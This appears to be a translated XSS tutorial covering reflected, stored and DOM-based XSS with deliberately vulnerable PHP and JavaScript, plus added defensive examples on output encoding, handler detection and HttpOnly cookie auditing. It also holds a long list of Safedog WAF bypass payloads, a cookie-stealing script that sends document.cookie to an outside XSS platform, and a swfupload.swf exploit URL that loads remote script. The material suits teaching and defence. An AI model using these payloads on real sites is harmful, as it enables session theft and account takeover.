XSS, also called cross-site scripting, arises when a website's front end handles input or output carelessly, so that script code can be inserted into the page and executed in visitors' browsers.

Types of XSS

XSS is mainly divided into reflected, stored and DOM-based.

1. Reflected: the submitted parameter is neither filtered nor escaped, so at the output point any script code in it executes directly.

```php
<form action="htmlzr.php" method="get">
name:<input type="text" name="htmlname">
<input type="submit" value="提交">
</form>
<?php
if (@$_GET['htmlname']) {
    // Vulnerable output: the GET parameter is echoed unencoded, so markup in it
    // is parsed by the browser and any script in it runs.
    echo $_GET['htmlname'];
}
?>
```
2. Stored: the submitted parameter is saved in the database, again without filtering or escaping, so when the database query returns it and it is output, the script code can execute for every visitor.

```php
<?php
// insertion side
$conn = mysqli_connect('localhost', 'root', 'root', 'test');
if (mysqli_connect_errno()) {            // mysqli_connect_errno() takes no arguments
    echo "连接 MySQL 失败: " . mysqli_connect_error();
}
if (@$_POST['name1']) {
    $name = $_POST['name1'];
    // The value is stored exactly as submitted; nothing is filtered or escaped.
    // (Building the SQL by string concatenation also leaves this open to SQL
    // injection; a prepared statement would fix that. The stored XSS, however,
    // lives at the output step below.)
    $sql = "INSERT INTO user (name) VALUES ('{$name}')";
    if (mysqli_query($conn, $sql)) {
        echo "添加成功";
    } else {
        echo "Error: " . $sql . "<br>" . mysqli_error($conn);
    }
}
?>
```

```php
<?php
// output side
$conn = mysqli_connect('localhost', 'root', 'root', 'test');
if (!$conn) {
    // $conn is false here, so the connection error must come from mysqli_connect_error()
    die('连接失败: ' . mysqli_connect_error());
}
mysqli_query($conn, "set names utf8");
$sql = 'select * from user where uid=3;';

$result = mysqli_query($conn, $sql);      // run the query once and reuse the result
if ($result) {
    $row = mysqli_fetch_array($result, MYSQLI_ASSOC);
    // Vulnerable output: the stored value is echoed into the page unencoded,
    // so a script stored in `name` runs in every visitor's browser.
    echo $row['name'];
} else {
    echo "Error: " . $sql . "<br>" . mysqli_error($conn);
}
?>
```
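The fix for both the reflected and the stored case above is the same: encode untrusted data for the HTML context at the point of output. The following is an added example, not code from the original post, written in Node.js to illustrate what the `echo $_GET['htmlname']` and `echo $row['name']` steps should do; the in-memory stand-in for the `user` table, the `data-name` attribute and the sample inputs are constructed for this example.

```javascript
// Encode the five characters that change meaning in HTML text and in
// quoted-attribute contexts (the equivalent of PHP's htmlspecialchars with
// ENT_QUOTES). Encoding happens at output, never at storage.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed stand-in for the `user` table. Values are stored exactly as
// submitted: storing raw input is fine, the encoding belongs to the output
// context, which the storage layer cannot know.
const userTable = new Map();
function insertUser(uid, name) {
  userTable.set(uid, { uid, name });
}

// Reflected case: what htmlzr.php should echo instead of the raw parameter.
function renderReflected(htmlname) {
  return `<p>name: ${escapeHtml(htmlname)}</p>`;
}

// Stored case: what the output script should echo for the fetched row. The
// value appears twice, in text context and inside a double-quoted attribute;
// one encoder serves both because it also encodes the quote characters.
function renderStored(uid) {
  const row = userTable.get(uid);
  if (!row) return '<p>no such user</p>';
  const safe = escapeHtml(row.name);
  return `<p data-name="${safe}">${safe}</p>`;
}

// Demo with constructed inputs mirroring the alert payloads in this post:
// a script tag for the stored path, an attribute-breakout attempt for the
// reflected path. Both come back as inert text.
function demo() {
  insertUser(3, '<script>alert(0)</script>');
  return {
    reflected: renderReflected('" onmouseover="alert(0)'),
    stored: renderStored(3),
  };
}

console.log(demo());
```

The attribute case is the one that catches people out: an encoder that leaves `"` alone (as `htmlspecialchars` without `ENT_QUOTES` does on PHP versions before 8.1) is safe in text context but not inside a quoted attribute, which is why the encoder here covers all five characters.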
    
3. DOM-based: I still prefer to classify this as reflected XSS. Here the script code is executed through document.write; the write() method writes HTML expressions or JavaScript code into the document.

```html
<script>
// Vulnerable: a substring of the URL, controlled by whoever crafts the link,
// is passed to document.write, which parses it as HTML.
var a = document.URL;
// "content=" is 8 characters long, so the value starts at indexOf(...) + 8
document.write(decodeURI(a.substring(document.URL.indexOf("content=") + 8)));
</script>
```
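A hardened version of that snippet, as an added example that is not part of the original post: the parameter is read with the URL parser instead of indexOf/substring arithmetic, and it is placed into the page as text (`textContent`) rather than being parsed as HTML by `document.write`. The `content` parameter name comes from the snippet above; the target element id `out` is an assumption for this example, and `renderContent` accepts any object with a `textContent` property so it can also run under Node.js.

```javascript
// Extract the `content` query parameter, or null if it is absent.
// URLSearchParams percent-decodes for us (and treats '+' as a space), and
// there is no manual decodeURI, which throws on malformed sequences.
function getContentParam(urlString) {
  return new URL(urlString).searchParams.get('content');
}

// Render into an element as text. Anything that looks like markup stays a
// sequence of literal characters, so URL-controlled data is never parsed as
// HTML. `target` is a DOM element in the browser; in the test it is a plain
// object with a textContent property.
function renderContent(urlString, target) {
  const value = getContentParam(urlString);
  target.textContent = value === null ? '' : value;
  return target.textContent;
}

// Browser usage, guarded so the same file also runs under Node.js.
// The element id "out" is assumed for this example.
if (typeof document !== 'undefined') {
  renderContent(document.URL, document.getElementById('out'));
}
```

If the requirement really is to insert HTML rather than text, the safe route is a sanitizer with an element/attribute allowlist applied before `innerHTML`; `document.write` on URL-derived data has no safe form.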

xss bypass safedog

Summary of Safedog bypass methods

XSS filter-bypass cheat sheet

Bypassing XSS filters with JavaScript global variables

XSS without parentheses or semicolons

Some Safedog bypass payloads (from ChaBug)

```html
<a onclick="javascript:alert(0)">a
<javascript onclick="javascript:alert(0)">a
<b onclick="javascript:alert(0)">a
<abbr onclick="javascript:alert(0)">a
<acronym onclick="javascript:alert(0)">a
<address onclick="javascript:alert(0)">a
<applet onclick="javascript:alert(0)">a
<article onclick="javascript:alert(0)">a
<xss onclick="javascript:alert(0)">a
<aside onclick="javascript:alert(0)">a
<bdi onclick="javascript:alert(0)">a
<bdo onclick="javascript:alert(0)">a
<big onclick="javascript:alert(0)">a
<button onclick="javascript:alert(0)">a
<del onclick="javascript:alert(0)">a
<details onclick="javascript:alert(0)">a
<div onclick="javascript:alert(0)">a
<dfn onclick="javascript:alert(0)">a
<dl onclick="javascript:alert(0)">a
<dt onclick="javascript:alert(0)">a
<h1 onclick="javascript:alert(0)">a
<h2 onclick="javascript:alert(0)">a
<h3 onclick="javascript:alert(0)">a
<h4 onclick="javascript:alert(0)">a
<h5 onclick="javascript:alert(0)">a
<h6 onclick="javascript:alert(0)">a
<header onclick="javascript:alert(0)">a
<hr onclick="javascript:alert(0)">a
<html onclick="javascript:alert(0)">a
<kbd onclick="javascript:alert(0)">a
<map onclick="javascript:alert(0)">a
<mark onclick="javascript:alert(0)">a
<menu onclick="javascript:alert(0)">a
<menuitem onclick="javascript:alert(0)">a
<meter onclick="javascript:alert(0)">a
<q onclick="javascript:alert(0)">a
<var onclick="javascript:alert(0)">a
<xmp onclick="javascript:alert(0)">a
<addons onclick="javascript:alert(0)">a
<ascii onclick="javascript:alert(0)">a
<aspx onclick="javascript:alert(0)">a
<java onclick="javascript:alert(0)">a
<mobile onclick="javascript:alert(0)">a
<go onclick="javascript:alert(0)">a
<alibaba onclick="javascript:alert(0)">a
<baidu onclick="javascript:alert(0)">a
<google onclick="javascript:alert(0)">a
<github onclick="javascript:alert(0)">a
<acu onclick="javascript:alert(0)">a
<mail onclick="javascript:alert(0)">a
<a onmouseover="javascript:alert(0)">a
<javascript onmouseover="javascript:alert(0)">a
<b onmouseover="javascript:alert(0)">a
<abbr onmouseover="javascript:alert(0)">a
<acronym onmouseover="javascript:alert(0)">a
<address onmouseover="javascript:alert(0)">a
<applet onmouseover="javascript:alert(0)">a
<article onmouseover="javascript:alert(0)">a
<xss onmouseover="javascript:alert(0)">a
<aside onmouseover="javascript:alert(0)">a
<bdi onmouseover="javascript:alert(0)">a
<bdo onmouseover="javascript:alert(0)">a
<big onmouseover="javascript:alert(0)">a
<button onmouseover="javascript:alert(0)">a
<del onmouseover="javascript:alert(0)">a
<details onmouseover="javascript:alert(0)">a
<div onmouseover="javascript:alert(0)">a
<dfn onmouseover="javascript:alert(0)">a
<dl onmouseover="javascript:alert(0)">a
<dt onmouseover="javascript:alert(0)">a
<h1 onmouseover="javascript:alert(0)">a
<h2 onmouseover="javascript:alert(0)">a
<h3 onmouseover="javascript:alert(0)">a
<h4 onmouseover="javascript:alert(0)">a
<h5 onmouseover="javascript:alert(0)">a
<h6 onmouseover="javascript:alert(0)">a
<header onmouseover="javascript:alert(0)">a
<hr onmouseover="javascript:alert(0)">a
<html onmouseover="javascript:alert(0)">a
<kbd onmouseover="javascript:alert(0)">a
<map onmouseover="javascript:alert(0)">a
<mark onmouseover="javascript:alert(0)">a
<menu onmouseover="javascript:alert(0)">a
<menuitem onmouseover="javascript:alert(0)">a
<meter onmouseover="javascript:alert(0)">a
<q onmouseover="javascript:alert(0)">a
<var onmouseover="javascript:alert(0)">a
<xmp onmouseover="javascript:alert(0)">a
<addons onmouseover="javascript:alert(0)">a
<ascii onmouseover="javascript:alert(0)">a
<aspx onmouseover="javascript:alert(0)">a
<java onmouseover="javascript:alert(0)">a
<mobile onmouseover="javascript:alert(0)">a
<go onmouseover="javascript:alert(0)">a
<alibaba onmouseover="javascript:alert(0)">a
<baidu onmouseover="javascript:alert(0)">a
<google onmouseover="javascript:alert(0)">a
<github onmouseover="javascript:alert(0)">a
<acu onmouseover="javascript:alert(0)">a
<mail onmouseover="javascript:alert(0)">a
```
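What the list above demonstrates from the defender's side is that a filter keyed on tag names cannot work: the browser's parser accepts unknown element names such as `<xss>` or `<acu>` and still fires their event-handler attributes. The following is an added example, not from the original post or from ChaBug, that runs two filters over a handful of the payloads: a tag-name blacklist of the kind the list defeats, and a check that flags any element carrying an `on*` attribute regardless of tag name. The blacklist contents and the sample lines are constructed for this example.

```javascript
// A tag-name blacklist, the kind of rule the payload list defeats. The set of
// names is constructed for this example.
const TAG_BLACKLIST = ['script', 'img', 'iframe', 'svg', 'object', 'embed', 'a', 'div'];

// True when the first tag in the input has a blacklisted name.
function blockedByTagBlacklist(input) {
  const m = /<\s*([a-z][\w-]*)/i.exec(input);
  return m !== null && TAG_BLACKLIST.includes(m[1].toLowerCase());
}

// True when any element, whatever its name, carries an on* attribute.
// This is a detection signal (a WAF alert or a log-scanning rule), not a
// sanitizer: regexes over HTML can be evaded, and the real fix is output
// encoding as shown earlier on this page.
function hasEventHandlerAttr(input) {
  return /<\s*[a-z][\w-]*[^>]*\s+on[a-z]+\s*=/i.test(input);
}

// Constructed samples: four lines drawn from the list above and two benign ones.
const SAMPLES = [
  '<a onclick="javascript:alert(0)">a',
  '<xss onclick="javascript:alert(0)">a',
  '<acu onmouseover="javascript:alert(0)">a',
  '<h1 onmouseover="javascript:alert(0)">a',
  '<b>plain bold</b>',
  'name=Tom',
];

// For each sample, report which of the two checks fires.
function evaluate(samples = SAMPLES) {
  return samples.map((sample) => ({
    sample,
    tagBlacklist: blockedByTagBlacklist(sample),
    eventHandler: hasEventHandlerAttr(sample),
  }));
}

console.table(evaluate());
```

Only the `<a ...>` line trips the blacklist, while all four payload lines trip the event-handler check and neither benign line does. The general lesson is to match on what makes the markup dangerous (handler attributes, `javascript:` URLs, script-bearing elements) rather than on a list of element names.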

Exploiting XSS

XSS is mainly used to steal the user's cookies, modify page content, or redirect to other dangerous sites. The script code usually does not need to be written by hand; an XSS platform provides code that can be used directly.

1. Stealing cookies (via an XSS platform): cookies normally have an expiry and are useless once it passes. To get around this, just tick keepsession on the XSS platform.

```javascript
function(){(new Image()).src='https://xsspt.com/index.php?do=api&id=4IobBm&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if(''==1){keep=new Image();keep.src='https://xsspt.com/index.php?do=keepsession&id=4IobBm&url='+escape(document.location)+'&cookie='+escape(document.cookie)};
```

Now an example:

```
www.xxxxx.com/statics/js/swfupload/swfupload.swf?movieName="])}catch(e){if(!window.x){window.x=1;document.body.appendChild(document.createElement('script')).src='https://xsshs.cn/1Uzk'}}//
```

Let's analyse this code. A value is passed to the movieName parameter of swfupload.swf. Inside the catch block an if is nested: when window.x is falsy, the code `document.createElement('script')).src='https://xsshs.cn/1Uzk'` runs. document.createElement creates a script element node in the DOM, and the script's src is pointed at the XSS site, which the browser fetches and executes. When a user clicks the link, their cookie is recorded.
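Every payload in this section works by reading `document.cookie`. A session cookie set with the HttpOnly attribute is not visible to `document.cookie` at all, so the injected script has nothing to send home. The following is an added example, not part of the original post, that audits `Set-Cookie` header values for the attributes a session cookie should carry. The header lines and the name heuristic for "looks like a session cookie" are constructed for this example.

```javascript
// Constructed heuristic: cookie names that usually carry a session or token.
const SESSION_NAME_HINT = /sess|sid|token|auth/i;

// Parse one Set-Cookie header value into its cookie name and an attribute
// map with lower-cased keys (valueless attributes such as HttpOnly map to true).
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((p) => p.trim());
  const eq = pair.indexOf('=');
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const attributes = {};
  for (const attr of attrs) {
    if (attr === '') continue;
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).trim().toLowerCase();
    attributes[key] = i === -1 ? true : attr.slice(i + 1).trim();
  }
  return { name, attributes };
}

// Return the findings for one header; an empty list means it passes.
// HttpOnly is the attribute that defeats document.cookie exfiltration, so it
// is required for session-like cookies; Secure and SameSite are checked for all.
function auditSetCookie(header) {
  const { name, attributes } = parseSetCookie(header);
  const findings = [];
  if (SESSION_NAME_HINT.test(name) && !attributes.httponly) {
    findings.push(`${name}: missing HttpOnly (readable via document.cookie)`);
  }
  if (!attributes.secure) findings.push(`${name}: missing Secure`);
  if (!attributes.samesite) findings.push(`${name}: missing SameSite`);
  return findings;
}

// Constructed sample headers: a bare PHP session cookie, a hardened session
// cookie, and a non-sensitive preference cookie.
const SAMPLE_HEADERS = [
  'PHPSESSID=abc123; Path=/',
  'sessionid=xyz; Path=/; HttpOnly; Secure; SameSite=Lax',
  'theme=dark; Path=/; Secure; SameSite=Lax',
];

// Map each cookie name to its findings.
function auditAll(headers = SAMPLE_HEADERS) {
  return Object.fromEntries(headers.map((h) => [parseSetCookie(h).name, auditSetCookie(h)]));
}

console.log(auditAll());
```

HttpOnly does not make the XSS go away: a script running in the page can still issue requests with the victim's cookies attached. It does remove the specific step these payloads rely on, which is why it belongs on every session cookie alongside the output encoding shown earlier.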